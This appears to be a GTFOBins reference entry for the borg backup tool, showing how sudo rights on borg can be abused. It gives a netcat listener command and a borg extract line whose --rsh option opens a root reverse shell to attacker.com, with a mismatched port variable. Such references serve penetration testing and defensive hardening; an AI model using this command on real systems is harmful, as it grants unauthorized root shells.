GTFOBins.github.io/_gtfobins/borg.md
2024-08-18 23:47:21 +08:00

259 B

sudo
description code
Run `nc -lvnp 12345` on the attacker box to receive the shell. RHOST=attacker.com RPORT=12345 NETCAT=/usr/bin/nc sudo borg extract .@.:/::. --rsh "$NETCAT $RHOST $LHOST -e sh"